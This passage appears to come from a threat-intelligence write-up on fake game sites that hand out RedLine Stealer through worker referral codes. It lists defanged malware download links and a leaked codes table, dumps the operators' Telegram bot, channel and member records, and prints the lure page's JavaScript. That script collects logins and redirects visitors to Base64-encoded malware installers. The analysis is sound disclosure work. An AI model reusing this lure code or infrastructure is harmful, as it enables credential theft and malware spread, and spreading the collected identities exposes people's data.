        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 260,
        "code": "U2BP-LY98",
        "worker": "12mrcryptology1 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 261,
        "code": "U2BP-O3BR",
        "worker": "12mrcryptology1 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 262,
        "code": "HM21-BAI0",
        "worker": "12Neennoon - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 263,
        "code": "HM21-TQP9",
        "worker": "12Neennoon - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 264,
        "code": "L5IQ-BIX8",
        "worker": "12Athe1st10yo - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 265,
        "code": "L5IQ-J6HD",
        "worker": "12Athe1st10yo - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 266,
        "code": "YW9B-ZI0S",
        "worker": "12gospodskyZ - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 267,
        "code": "YW9B-AO8E",
        "worker": "12gospodskyZ - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 268,
        "code": "SM6G-YL21",
        "worker": "12Husky192 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 269,
        "code": "SM6G-NEPL",
        "worker": "12Husky192 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 270,
        "code": "ZPU7-E2YP",
        "worker": "12srtevil - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar",
        "oslink": ""
    },
    {
        "id": 271,
        "code": "ZPU7-N0QY",
        "worker": "12srtevil - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    }
]

Destruction code input

This one is pretty interesting. Although the code was not asked on the website, it is required once their Windows "launcher" is opened.

DestructionSetup.exe (SHA256: 5264cebc91d6dac5dde818de62c23ccc9054eb79ce1370e8c15a5950e1d86d23)

Using horsicq's Detect It Easy, we can determine that the executable file was created using Nullsoft Scriptable Install System (NSIS), and we can extract the data since it is a self-contained executable installer.

We can infer from the extracted data that the Electron framework was used to create the application.

The way the application was packed is the same as the previous finding for PureLand. After extracting the Atom Shell Archive (.asar), we can see that the Telegram bot token & channel ID to notify the malicious actors and the MySQL database to validate the code are exposed. The method to load the RedLine Stealer malware is also present, which will be discussed later.

Source code of api.php

MySQL database - destruction - codes table

codes table (5-4-2023)

```
id,code_name,worker,worker_id
2,rocket,rocketaaa3,770562006
3,refferalexample,rocketaaa3,770562006
4,TESTCODE123,killrealReal,5722795952
5,CODE1234,killrealReal,5722795952
6,gogogo123,misterio000s,5977960277
9,TESTIK,rocketaaa3,770562006
10,TESTIK32323,rocketaaa3,770562006
11,RefDeshi1,tag321321,5239890474
12,Pro-msaa-228,John_Smith_Web,5949411236
13,Loh,amominaa,5079203956
14,HAN-449,John_Smith_Web,5949411236
15,yanaoo-4492,John_Smith_Web,5949411236
16,Longestong-7788,John_Smith_Web,5949411236
17,幣須讓我看看-4879,John_Smith_Web,5949411236
18,956-IKN,John_Smith_Web,5949411236
19,Ebenezer-473g,John_Smith_Web,5949411236
20,Art-Kateiva-992,John_Smith_Web,5949411236
21,ViewtifulJoe-001,FQ_4444,902686038
22,Ancongshu-9945,John_Smith_PR,5949411236
23,Dist2023,Liptonkilla,1079362827
24,oversea-997,John_Smith_PR,5949411236
25,SHOW-GH22,John_Smith_PR,5949411236
26,SeemsGood-GH12,John_Smith_PR,5949411236
28,7059-ch2023,FQ_4444,902686038
29,code1233333,killrealReal,5722795952
30,LOPIRT,misterioo22,6176236268
33,VSGT-99TT,mirrorfromcrazy,6249921311
34,gigior,Ilpandone,5057384734
36,PEMI-0612,John_Smith_PR,5949411236
38,Burn-test1,FQ_4444,902686038
40,AS16-UJKI,thatbuddy,5628726932
41,AS76-718A,thatbuddy,5628726932
42,fong-2023,FQ_4444,902686038
44,OleSkin-2023,FQ_4444,902686038
45,卧龍-567GF,John_Smith_PR,5949411236
46,FredSmith-test01,FQ_4444,902686038
48,BETA-V234,etozhezhe,1703357071
49,Sandman-678GH,John_Smith_PR,5949411236
50,Z563Z,vxlxrd,5091182401
53,jokereven-GHFF19,John_Smith_PR,5949411236
54,Athena213-MOD,FQ_4444,902686038
55,Cyberarts,amominaa,5079203956
56,Kana-mod10,FQ_4444,902686038
57,oh_yes-mod1,FQ_4444,902686038
59,DVJK-KPRZ,Liptonkilla,1079362827
60,as,Ombrre,5070292603
61,guiandahalf-GH567,John_Smith_PR,5949411236
63,wcdonulds-GHF13,John_Smith_PR,5949411236
64,WVYN3-MOD-TEST,FQ_4444,902686038
65,oh-yes-mod,FQ_4444,902686038
66,Million-GHT32,John_Smith_PR,5949411236
67,rocketa33333,rocketaaa3,770562006
68,BKLS-TEST,FQ_4444,902686038
69,rocketa2323233223,essei_xeda,5722795952
70,DJFP-5KUR,@workworkworkworkworkworkworkkkkk,5394631060
71,VL5N-VHS9,@HAQzxc,5797693457
72,D3ST-RUCT-10N,@workworkworkworkworkworkworkkkkk,5394631060
73,LA-SAO012,hackingisinter,5647443532
74,LA-DES91,hackingisinter,5647443532
76,TheDestroyer,mirrorfromcrazy,6249921311
78,ychow-HG67,John_Smith_Web,5949411236
79,UKTR-DEBM,Liptonkilla,1079362827
80,oh-yes_modtest,FQ_4444,902686038
81,Tommy18,6a6ylllka,6018059972
82,0xCapu,6a6ylllka,6018059972
83,TomBTEST,6a6ylllka,6018059972
84,FISSbetest,6a6ylllka,6018059972
85,NWNQ4PZ,id_glaz,5735540043
86,NicoBETA,6a6ylllka,6018059972
87,NicoNFTbeta,6a6ylllka,6018059972
88,Oluwatosin-GHT85,John_Smith_Web,5949411236
90,Zack51,6a6ylllka,6018059972
91,leoDroidDEW,6a6ylllka,6018059972
92,leoDroid2,6a6ylllka,6018059972
93,AS16-SODP,thatbuddy,5628726932
94,leoDroidDEWELOP,6a6ylllka,6018059972
95,NM01-DF57,Ivantubik,819365191
97,vintotkyutiie-GHT45,John_Smith_Web,5949411236
98,Venenum-GY678,John_Smith_Web,5949411236
99,SniperNFT-GHY73,John_Smith_Web,5949411236
100,Dorian-JKR576,John_Smith_Web,5949411236
103,DovanGuild,6a6ylllka,6018059972
104,CrazyARTIST,6a6ylllka,6018059972
106,D3ST-RUCT-10N2548,@workworkworkworkworkworkworkkkkk,5394631060
107,Ryan-JKY93,John_Smith_Web,5949411236
108,Dawgy-JKG56,John_Smith_Web,5949411236
109,MannexLFG-JYT89,John_Smith_Web,5949411236
110,MooAngKing-mod,FQ_4444,902686038
111,Wiz-LKF17,John_Smith_Web,5949411236
112,cookie-mod,FQ_4444,902686038
113,Zen-FGT889,John_Smith_Web,5949411236
114,yadhukrishnaMOD,6a6ylllka,6018059972
115,Shinnoske-NDF92,John_Smith_Web,5949411236
116,BRYAN-DVF42,John_Smith_Web,5949411236
117,test-mod-ch,FQ_4444,902686038
118,toswin-mod,FQ_4444,902686038
119,HoustonBETA,6a6ylllka,6018059972
121,aar0n-VHS9,@HAQzxc,5797693457
122,Idol-TYH43,John_Smith_Web,5949411236
123,feifeichihuo-mod,FQ_4444,902686038
124,CH-MOD-GF11,John_Smith_Web,5949411236
125,"SummerPK -MOD",FQ_4444,902686038
126,Wagon-mod-jp,John_Smith_Web,5949411236
127,Jossive-mod-3,John_Smith_Web,5949411236
129,GTQ7ZK,id_glaz,5735540043
130,herry-mod-ch,John_Smith_Web,5949411236
131,AL22-186M,thatbuddy,5628726932
132,CP8T-3QML,@Berserrrrrrk,6110459453
133,drizzygame,Ivantubik,819365191
137,Mavenx-MOD,FQ_4444,902686038
138,MoizArfeen-MOD,FQ_4444,902686038
140,Test456,tanaskoo,6075807810
141,test111,tanaskoo,6075807810
142,cryptometaDEVELOPER,6a6ylllka,6018059972
143,centrylove,tanaskoo,6075807810
144,cointoearn321,tanaskoo,6075807810
145,ALPHAMACTEST,etozhezhe,1703357071
146,Krishnaop-mod-GT12,John_Smith_Web,5949411236
147,mohammedDEV,6a6ylllka,6018059972
148,D3ST-RUCT-10N-PLAYER42,@workworkworkworkworkworkworkkkkk,5394631060
149,KapDEV,6a6ylllka,6018059972
150,Test321,tanaskoo,6075807810
151,matthewbeta,Ilpandone,5057384734
155,Mod-ch-00,FQ_4444,902686038
156,razm1ro,amominaa,5079203956
157,test222,tanaskoo,6075807810
158,JKWR-HNAM,Liptonkilla,1079362827
160,suejayke04-mod-56,John_Smith_Web,5949411236
161,test098,tanaskoo,6075807810
162,BEEZ,6a6ylllka,6018059972
163,CY.Queen-mod-ch,John_Smith_Web,5949411236
165,writer,tanaskoo,6075807810
166,jacklovehh-mod-ch,John_Smith_Web,5949411236
167,test88388,tanaskoo,6075807810
168,Landz,amominaa,5079203956
169,test,tanaskoo,6075807810
170,video,tanaskoo,6075807810
174,BubbleApe,tanaskoo,6075807810
176,test1,tanaskoo,6075807810
178,Staff9950,mirrorfromcrazy,6249921311
179,Staff9100,mirrorfromcrazy,6249921311
180,Wian-mod-ch,John_Smith_Web,5949411236
181,amdcode173719,trippiestick,6146455033
182,GLTW-XRBW,Liptonkilla,1079362827
183,staff9280,mirrorfromcrazy,6249921311
185,James,amominaa,5079203956
186,xianglee5-mod-ch,John_Smith_Web,5949411236
187,KingGray,amominaa,5079203956
188,Horlar9282-mod-ch,John_Smith_Web,5949411236
189,YJ-mod-ch,John_Smith_Web,5949411236
190,hardiksunnygandhi-mod-462,John_Smith_Web,5949411236
191,nyaumon,amominaa,5079203956
192,BrokenKingss,amominaa,5079203956
193,D3ST-RUCT-10N-13,@workworkworkworkworkworkworkkkkk,5394631060
194,e34,tanaskoo,6075807810
195,test44444,tanaskoo,6075807810
196,Plory,tanaskoo,6075807810
197,Jerryzart0xloa-mod-ch,John_Smith_Web,5949411236
198,designer,tanaskoo,6075807810
199,Tiga-mod-ch,John_Smith_Web,5949411236
200,帅帅-mod-ch,John_Smith_Web,5949411236
203,WHITEBOAR,6a6ylllka,6018059972
204,WHITEBOARD,6a6ylllka,6018059972
205,f36ghty64adm,trippiestick,6146455033
208,digitalwave0,amominaa,5079203956
209,FonsNFT,6a6ylllka,6018059972
210,digitalwave,amominaa,5079203956
211,ERKX-MAPI,Liptonkilla,1079362827
212,crtr_nft,6a6ylllka,6018059972
213,staff5518,mirrorfromcrazy,6249921311
215,Staff9914,mirrorfromcrazy,6249921311
216,DEV-10091,etozhezhe,1703357071
217,staff5110,mirrorfromcrazy,6249921311
218,Staff9553,mirrorfromcrazy,6249921311
219,Staff8150,mirrorfromcrazy,6249921311
220,Destromod!@#$50q9F,mirrorfromcrazy,6249921311
221,Horpa,amominaa,5079203956
222,Khelly,6a6ylllka,6018059972
223,KIMN-IPWE,Liptonkilla,1079362827
224,lcy4444-mod-ch,John_Smith_Web,5949411236
226,kyotoSOCIAL,6a6ylllka,6018059972
227,MrbenSOCIAL,6a6ylllka,6018059972
228,Elvis,6a6ylllka,6018059972
229,kelvinDEV,6a6ylllka,6018059972
230,hosein,amominaa,5079203956
231,staff5157,mirrorfromcrazy,6249921311
232,wgSOCIAL,6a6ylllka,6018059972
233,AmandaSOCIAL,6a6ylllka,6018059972
234,admcodetywkd,trippiestick,6146455033
235,admcode37,trippiestick,6146455033
236,Staff92255,mirrorfromcrazy,6249921311
237,Staff45233,mirrorfromcrazy,6249921311
238,KlickxDestruction,mirrorfromcrazy,6249921311
239,Amei-mod-ch,John_Smith_Web,5949411236
240,promo551034,mirrorfromcrazy,6249921311
241,MarketingMiko2704,mirrorfromcrazy,6249921311
242,Mod-ch-GH412,John_Smith_Web,5949411236
243,Halad-mod-ch,John_Smith_Web,5949411236
244,oooy-mod-ch,John_Smith_Web,5949411236
245,BAEOxxcat1-mod-ch,John_Smith_Web,5949411236
246,Justin-mod-ch,John_Smith_Web,5949411236
247,emmanuel,tanaskoo,6075807810
248,WD9I-3LID,@Berserrrrrrk,6110459453
250,WizardDeecy-mod-ch,John_Smith_Web,5949411236
251,JayCee-mod-ch,John_Smith_Web,5949411236
252,小韭菜-mod-ch,John_Smith_Web,5949411236
253,Dennison,amominaa,5079203956
254,Translator,tanaskoo,6075807810
255,MrBenSOL,6a6ylllka,6018059972
256,Jhcoder,mirrorfromcrazy,6249921311
257,Tomoyan,mirrorfromcrazy,6249921311
258,asdasd3333333,misterioo22,6176236268
259,DestroChina01015,mirrorfromcrazy,6249921311
260,DestroChinaStuff,mirrorfromcrazy,6249921311
261,flexy-mod-ch,John_Smith_Web,5949411236
262,Destrostaff5950,mirrorfromcrazy,6249921311
263,zhtryid15682,trippiestick,6146455033
264,SeamanSOC,6a6ylllka,6018059972
265,0520-mod-ch,John_Smith_Web,5949411236
266,Jo-mod-eng,John_Smith_Web,5949411236
```

We can then query the Telegram details using the Telegram bot token, channel ID, and their worker_id as their user ID.

Telegram bot and channel details (5-28-2023)

===== Bot details =====
{
    "ok": true,
    "result": {
        "id": 6046856403,
        "is_bot": true,
        "first_name": "Lendings",
        "username": "destructionlogs_bot",
        "can_join_groups": true,
        "can_read_all_group_messages": false,
        "supports_inline_queries": false
    }
}


===== Chat info =====
{
    "ok": true,
    "result": {
        "id": -1001890707141,
        "title": "logs",
        "type": "supergroup",
        "invite_link": "https://t.me/+0lPAmD4p5sQzZWE9",
        "can_set_sticker_set": true,
        "permissions": {
            "can_send_messages": false,
            "can_send_media_messages": false,
            "can_send_audios": false,
            "can_send_documents": false,
            "can_send_photos": false,
            "can_send_videos": false,
            "can_send_video_notes": false,
            "can_send_voice_notes": false,
            "can_send_polls": false,
            "can_send_other_messages": false,
            "can_add_web_page_previews": false,
            "can_change_info": false,
            "can_invite_users": false,
            "can_pin_messages": false,
            "can_manage_topics": false
        },
        "join_to_send_messages": true
    }
}



===== Chat admins =====
{
    "ok": true,
    "result": [
        {
            "user": {
                "id": 6176236268,
                "is_bot": false,
                "first_name": "Meowsterio",
                "username": "misterioo22",
                "language_code": "ru",
                "is_premium": true
            },
            "status": "administrator",
            "can_be_edited": false,
            "can_manage_chat": true,
            "can_change_info": true,
            "can_delete_messages": true,
            "can_invite_users": true,
            "can_restrict_members": true,
            "can_pin_messages": true,
            "can_manage_topics": false,
            "can_promote_members": true,
            "can_manage_video_chats": true,
            "is_anonymous": false,
            "can_manage_voice_chats": true,
            "custom_title": "boss"
        },
        {
            "user": {
                "id": 6046856403,
                "is_bot": true,
                "first_name": "Lendings",
                "username": "destructionlogs_bot"
            },
            "status": "administrator",
            "can_be_edited": false,
            "can_manage_chat": true,
            "can_change_info": true,
            "can_delete_messages": true,
            "can_invite_users": true,
            "can_restrict_members": true,
            "can_pin_messages": true,
            "can_manage_topics": false,
            "can_promote_members": true,
            "can_manage_video_chats": true,
            "is_anonymous": false,
            "can_manage_voice_chats": true
        },
        {
            "user": {
                "id": 5977960277,
                "is_bot": false,
                "first_name": ""
            },
            "status": "administrator",
            "can_be_edited": false,
            "can_manage_chat": true,
            "can_change_info": true,
            "can_delete_messages": true,
            "can_invite_users": true,
            "can_restrict_members": true,
            "can_pin_messages": true,
            "can_manage_topics": false,
            "can_promote_members": true,
            "can_manage_video_chats": true,
            "is_anonymous": true,
            "can_manage_voice_chats": true
        },
        {
            "user": {
                "id": 5722795952,
                "is_bot": false,
                "first_name": "Killreal",
                "username": "kill_r_eal",
                "language_code": "ru"
            },
            "status": "creator",
            "is_anonymous": false
        }
    ]
}


===== Chat member count =====
{
    "ok": true,
    "result": 144
}

Telegram channel members (5-4-2023)

[
    {
        "ok": true,
        "result": {
            "user": {
                "id": 770562006,
                "is_bot": false,
                "first_name": "sanders",
                "last_name": "basket",
                "username": "sandersrocket",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5722795952,
                "is_bot": false,
                "first_name": "Killreal",
                "username": "essei_xeda",
                "language_code": "ru"
            },
            "status": "creator",
            "is_anonymous": false
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5977960277,
                "is_bot": false,
                "first_name": ""
            },
            "status": "administrator",
            "can_be_edited": false,
            "can_manage_chat": true,
            "can_change_info": true,
            "can_delete_messages": true,
            "can_invite_users": true,
            "can_restrict_members": true,
            "can_pin_messages": true,
            "can_manage_topics": false,
            "can_promote_members": true,
            "can_manage_video_chats": true,
            "is_anonymous": true,
            "can_manage_voice_chats": true
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5239890474,
                "is_bot": false,
                "first_name": "Kunchik \ud83d\udc32",
                "username": "tag321321",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5949411236,
                "is_bot": false,
                "first_name": "John",
                "last_name": "Smith",
                "username": "John_Smith_PR",
                "language_code": "ru",
                "is_premium": true
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5079203956,
                "is_bot": false,
                "first_name": "TheGod",
                "username": "amominaa",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 902686038,
                "is_bot": false,
                "first_name": "FQ",
                "username": "FQ_4444",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 1079362827,
                "is_bot": false,
                "first_name": "Black Flag",
                "username": "Liptonkilla",
                "language_code": "ru",
                "is_premium": true
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 6176236268,
                "is_bot": false,
                "first_name": "Meowsterio",
                "username": "misterioo22",
                "language_code": "ru",
                "is_premium": true
            },
            "status": "administrator",
            "can_be_edited": false,
            "can_manage_chat": true,
            "can_change_info": true,
            "can_delete_messages": true,
            "can_invite_users": true,
            "can_restrict_members": true,
            "can_pin_messages": true,
            "can_manage_topics": false,
            "can_promote_members": true,
            "can_manage_video_chats": true,
            "is_anonymous": false,
            "can_manage_voice_chats": true,
            "custom_title": "boss"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 6249921311,
                "is_bot": false,
                "first_name": "Mirror \ud83c\uddef\ud83c\uddf5",
                "username": "mirrorfromcrazy",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5057384734,
                "is_bot": false,
                "first_name": "pa",
                "username": "ilpandaz",
                "language_code": "it"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5628726932,
                "is_bot": false,
                "first_name": "percoset \ud83c\uddef\ud83c\uddf5",
                "username": "thatbuddy",
                "language_code": "ru",
                "is_premium": true
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 1703357071,
                "is_bot": false,
                "first_name": "\ud83c\udc04\ufe0f Etozhezhe",
                "last_name": "\u2618\ufe0f",
                "username": "etozhezhe",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5091182401,
                "is_bot": false,
                "first_name": "\ud835\ude2d\ud835\ude39\ud835\ude33\ud835\ude25",
                "username": "vxlxrd",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5070292603,
                "is_bot": false,
                "first_name": "Noir",
                "username": "Ombrre",
                "language_code": "en",
                "is_premium": true
            },
            "status": "left"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5394631060,
                "is_bot": false,
                "first_name": "\ud83d\udc33 h1ch",
                "username": "workworkworkworkworkworkworkkkkk",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5797693457,
                "is_bot": false,
                "first_name": "HAQ",
                "username": "HAQzxc",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5647443532,
                "is_bot": false,
                "first_name": "sickle",
                "username": "hackingisinter",
                "language_code": "zh-hans",
                "is_premium": true
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 6018059972,
                "is_bot": false,
                "first_name": "\ud835\udc07\ud835\udc22\ud835\udc1d\ud835\udc1e\ud835\udc28",
                "username": "hideo_eth",
                "language_code": "en"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 5735540043,
                "is_bot": false,
                "first_name": "@id_glaz",
                "username": "id_glaz",
                "language_code": "en",
                "is_premium": true
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 819365191,
                "is_bot": false,
                "first_name": "Ivantubik",
                "username": "Ivantubik",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 6110459453,
                "is_bot": false,
                "first_name": "Berserk",
                "username": "Berserrrrrrk",
                "language_code": "en"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 6075807810,
                "is_bot": false,
                "first_name": "\u1160 \u1160",
                "username": "tanaskoo",
                "language_code": "ru"
            },
            "status": "member"
        }
    },
    {
        "ok": true,
        "result": {
            "user": {
                "id": 6146455033,
                "is_bot": false,
                "first_name": "Sicko",
                "last_name": "Maan",
                "username": "trippiestick",
                "language_code": "ru"
            },
            "status": "member"
        }
    }
]

Telegram channel members - some changes (5-28-2023)

Previously essei_xeda
{
    "ok": true,
    "result": {
        "user": {
            "id": 5722795952,
            "is_bot": false,
            "first_name": "Killreal",
            "username": "kill_r_eal",
            "language_code": "ru"
        },
        "status": "creator",
        "is_anonymous": false
    }
}

Previously John_Smith_PR
{
    "ok": true,
    "result": {
        "user": {
            "id": 5949411236,
            "is_bot": false,
            "first_name": "Mostkolf_eth",
            "username": "John_Smith_FO",
            "language_code": "ru",
            "is_premium": true
        },
        "status": "member"
    }
}

Previously @id_glaz
{
    "ok": true,
    "result": {
        "user": {
            "id": 5735540043,
            "is_bot": false,
            "first_name": "idk why r u trying be better than me",
            "username": "id_glaz",
            "language_code": "ru",
            "is_premium": true
        },
        "status": "member"
    }
}

Guardians of the Throne code input

A POST request is sent to https://guardians-game[.]com/api.php with the form data of login, password, referral, code, key, and type.

Once valid, a download button appears on the page. A POST request is sent to https://guardians-game[.]com/message.php when the download button is clicked. The file to be downloaded depends on the referral code that was used. Also, the download link is encoded in Base64, which is seen on the value for the out.

File download for Windows. aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vcy83ZW8yZDQ4MGRqam92ZHgvR3VhcmRpYW5zTGF1bmNoZXIuZXhlP2RsPTE -> https://www.dropbox[.]com/s/7eo2d480djjovdx/GuardiansLauncher.exe?dl=1

File download for macOS. aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vcy9pZ3ZjeDRzODl0cm5hcGEvR3VhcmRpYW5zSW5zdGFsbGVyLnBrZz9kbD0x -> https://www.dropbox[.]com/s/igvcx4s89trnapa/GuardiansInstaller.pkg?dl=1

There's also a fallback to download a Windows portable executable file when the download type does not match either of the first two if conditions.

aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vcy9id25hM3p2aHhsODIxM3cvR3VhcmRpYW5zQ2F0YWxvZy5leGU 
-> https://www.dropbox[.]com/s/bwna3zvhxl8213w/GuardiansCatalog.exe?dl=1

JavaScript (03-28-2023)

        var downloadType = "launcher";

        function changeDownloadType(type) {
            downloadType = type;
        }

        function changecheck() {
         if($('#change').hasClass('hasc')){
            $('#change').removeClass('nonei')
            $('#changecl').addClass('nonei')
            $('#change').removeClass('hasc')
         }
         else{
            $('#change').addClass('hasc')
            $('#change').addClass('nonei')
            $('#changecl').removeClass('nonei')
         }
        }

        async function sendRequest(data, url) {
            const formData = new URLSearchParams();
            Object[.]entries(data).forEach(([key, value]) => {
                formData[.]append(key, value);
            });

            const response = await fetch(url, {
                method: 'POST',
                headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: formData,
            });
            return response[.]json();
        }

        async function dowloand() {
            let code = $('#inp4').val()
            let data = {
                refferal: code,
                link: 'Windows',
                useragent: window[.]navigator[.]userAgent
            }

            let response = await sendRequest(data, 'https://guardians-game[.]com/message[.]php')

            if (response['status'] == true) { 
                if (response['type'] == 'mac') { 
                    return window[.]location[.]href = atob(response['out'])
                }
                if (downloadType == 'launcher') {
                   return window[.]location[.]href = atob(response['out'])
                }
                return window[.]location[.]href = atob('aHR0cHM6Ly93d3cuZHJvcGJveC5jb20vcy9id25hM3p2aHhsODIxM3cvR3VhcmRpYW5zQ2F0YWxvZy5leGU/ZGw9MQ==')
            }
        }

        async function none(){
            let inp2 = $('#inp2').val()
            let inp3 = $('#inp3').val()
            let inp4 = $('#inp4').val()


            if (inp2[.]length < 4){
                return $('#inp2').addClass('border')
            }
            if (inp3[.]length < 6){
                return $('#inp3').addClass('border')
            }

            if(inp2[.]length != 0 & inp3[.]length != 0 & $('#change').hasClass('hasc')){
                let data = {
                    login: inp2,
                    password: inp3, 
                    refferal: inp4,
                    code: 'Not code, but register',
                    key: 'MWMwMzU3YTc5MDUxMGVhZjQ2YmViYjY2YzQ3YzhkYmU=',
                    type: 'register'
                }

                let response  = await sendRequest(data, 'https://guardians-game[.]com/api[.]php')

                if (response['status'] == false){
                    if (response['type'] == 'login_err') {
                        return $('#inp2').addClass('border')
                    }
                    return $('#inp4').addClass('border')
                }

                $('#main').addClass('nonei')
                none32()

                localStorage[.]setItem('worker', inp4);


            }
        }
        function inp(){
             if (inp2[.]length != 0){
                $('#inp2').removeClass('border')
            }
             if (inp3[.]length != 0){
                $('#inp3').removeClass('border')
            }
             if (inp4[.]length != 0){
                $('#inp4').removeClass('border')
            }
        }
        function none32(){
            $('#none1').addClass('none1')
            $('#none2').removeClass('none2')
        }

This fallback part was then removed later on.

JavaScript

        var downloadType = "launcher";

        function changeDownloadType(type) {
            downloadType = type;
        }

        function changecheck() {
         if($('#change').hasClass('hasc')){
            $('#change').removeClass('nonei')
            $('#changecl').addClass('nonei')
            $('#change').removeClass('hasc')
         }
         else{
            $('#change').addClass('hasc')
            $('#change').addClass('nonei')
            $('#changecl').removeClass('nonei')
         }
        }

        async function sendRequest(data, url) {
            const formData = new URLSearchParams();
            Object[.]entries(data).forEach(([key, value]) => {
                formData[.]append(key, value);
            });

            const response = await fetch(url, {
                method: 'POST',
                headers: {
                'Content-Type': 'application/x-www-form-urlencoded',
                },
                body: formData,
            });
            return response[.]json();
        }

        async function dowloand() {
            let code = $('#inp4').val()
            let data = {
                refferal: code,
                link: 'Windows',
                useragent: window[.]navigator[.]userAgent
            }



            let response = await sendRequest(data, 'https://guardians-game[.]com/message[.]php')
        
            if (response['status'] == true) { 
                window[.]location[.]href = atob(response['out'])
            }
            
            // let response = sendRequest('/vendor/back[.]php?code=' + code)
            // let json = JSON[.]parse(response)
            // if (json['status'] == 'True') {
            //     if (downloadType == "launcher") {
            //         window[.]location[.]href = atob(json['link'])
            //         sendRequest('/vendor/clicked[.]php?link=' + atob(json['link']) + '&code=' + code)
            //     } else {
            //         window[.]location[.]href = atob(json['link-catalog'])
            //         sendRequest('/vendor/clicked[.]php?link=' + atob(json['link-catalog']) + '&code=' + code)
            //     }
            // }
        }

        async function none(){
            let inp2 = $('#inp2').val()
            let inp3 = $('#inp3').val()
            let inp4 = $('#inp4').val()


            if (inp2[.]length < 1){
                return $('#inp2').addClass('border')
            }
            if (inp3[.]length < 1){
                return $('#inp3').addClass('border')
            }

            if(inp2[.]length != 0 & inp3[.]length != 0 & $('#change').hasClass('hasc')){
                let data = {
                    login: inp2,
                    password: inp3, 
                    refferal: inp4,
                    code: 'Not code, but register',
                    key: 'MWMwMzU3YTc5MDUxMGVhZjQ2YmViYjY2YzQ3YzhkYmU=',
                    type: 'register'
                }

                let response  = await sendRequest(data, 'https://guardians-game[.]com/api[.]php')

                if (response['status'] == false){
                    return $('#inp4').addClass('border')
                }

                $('#main').addClass('nonei')
                none32()

                localStorage[.]setItem('worker', inp4);


            }
        }
        function inp(){
             if (inp2[.]length != 0){
                $('#inp2').removeClass('border')
            }
             if (inp3[.]length != 0){
                $('#inp3').removeClass('border')
            }
             if (inp4[.]length != 0){
                $('#inp4').removeClass('border')
            }
        }
        function none32(){
            $('#none1').addClass('none1')
            $('#none2').removeClass('none2')
        }

Another interesting part here is that the app.asar for their Windows build, GuardiansLauncher.exe (SHA256: 026518bd9d1721b15a10380778cc81acf59cf7e68152c9bd7b953ff38375c3ce), has the api.php file like what was found on Destruction code input. It uses the same Telegram bot, MySQL server (37.220.87[.]1), and credentials.

